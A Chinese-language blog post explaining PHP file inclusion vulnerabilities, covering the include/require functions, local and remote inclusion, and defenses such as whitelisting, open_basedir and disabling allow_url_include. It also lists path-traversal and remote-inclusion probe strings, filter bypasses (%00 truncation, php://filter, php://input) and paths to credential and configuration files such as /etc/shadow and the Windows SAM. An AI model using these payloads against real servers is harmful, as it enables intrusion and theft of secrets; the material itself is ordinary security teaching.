文件包含

文件包含

文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。

    1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。

    2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。

    因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。

文件包含函数

require:找不到被包含的文件,报错,并且停止运行脚本。

include:找不到被包含的文件,只会报错,但会继续运行脚本。

require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。

include_once:与include类似,区别在于当重复调用同一文件时,程序只调用一次。

检测方法:

?file=../../../../etc/passwd

?page=file:///etc/passwd

?home=main.cgi

?page=http://www.a.com/1.php

http://1.1.1.1/../../../../dir/file.txt

绕过方法:

%00、 0b 截断

?绕过 #绕过 空格绕过  在文件的后缀后加

php伪协议:php://   php://filter php://input(读取POST数据)

常见的敏感信息路径:

    Windows系统

  c:\boot.ini // 查看系统版本

  c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件

  c:\windows\repair\sam // 存储Windows系统初次安装的密码

  c:\ProgramFiles\mysql\my.ini // MySQL配置

  c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码

  c:\windows\php.ini // php 配置信息

    Linux/Unix系统

  /etc/passwd // 账户信息

  /etc/shadow // 账户密码文件

  /usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

  /usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

  /usr/local/app/php5/lib/php.ini // PHP相关配置

  /etc/httpd/conf/httpd.conf // Apache配置文件

/etc/my.conf // mysql 配置文件

漏洞危害:

执行任意代码

读取文件源码或敏感信息。

包含恶意文件控制网站,甚至控制服务器。

漏洞防御:

设置白名单

代码在进行文件包含时,如果文件名可以确定,可以设置白名单对传入的参数进行比较。

过滤危险字符

由于Include/Require可以对PHP Wrapper形式的地址进行包含执行(需要配置php.ini),在Linux环境中可以通过”…/…/”的形式进行目录绕过,所以需要判断文件名称是否为合法的PHP文件。

设置文件目录(配置php.ini)

PHP配置文件中有open_basedir选项可以设置用户需要执行的文件目录,如果设置目录的话,PHP仅仅在该目录内搜索文件。

关闭危险配置(配置php.ini)

PHP配置中的allow_url_include选项如果打开,PHP会通过Include/Require进行远程文件包含,由于远程文件的不可信任性及不确定性,在开发中禁止打开此选项,PHP默认是关闭的。

本地文件包含:

本地文件包含就是通过浏览器包含web服务器上的文件,这种漏洞是因为浏览器包含文件时没有进行严格的过滤允许遍历目录的字符注入浏览器并执行。文件包含漏洞还包含当前服务器中的其他文件,同时支持包含Web应用程序的目录,尝试包括你的硬盘的一些内容,例如:C:\WINDOWS\system.ini。

 

 

远程文件包含:

allow_url_fopen = On  allow_url_include = On

可以在服务器上制作以恶搞恶意文件,通过http或https进行上传,即可达到远程控制

相关文章

https://blog.csdn.net/qq_41617034/article/details/106658417

https://www.cnblogs.com/i-nily/p/10152305.html

https://blog.csdn.net/qq_38348692/article/details/100797842

 

posted @ 2021-03-10 14:41  可乐-kele  阅读(100)  评论(0编辑  收藏  举报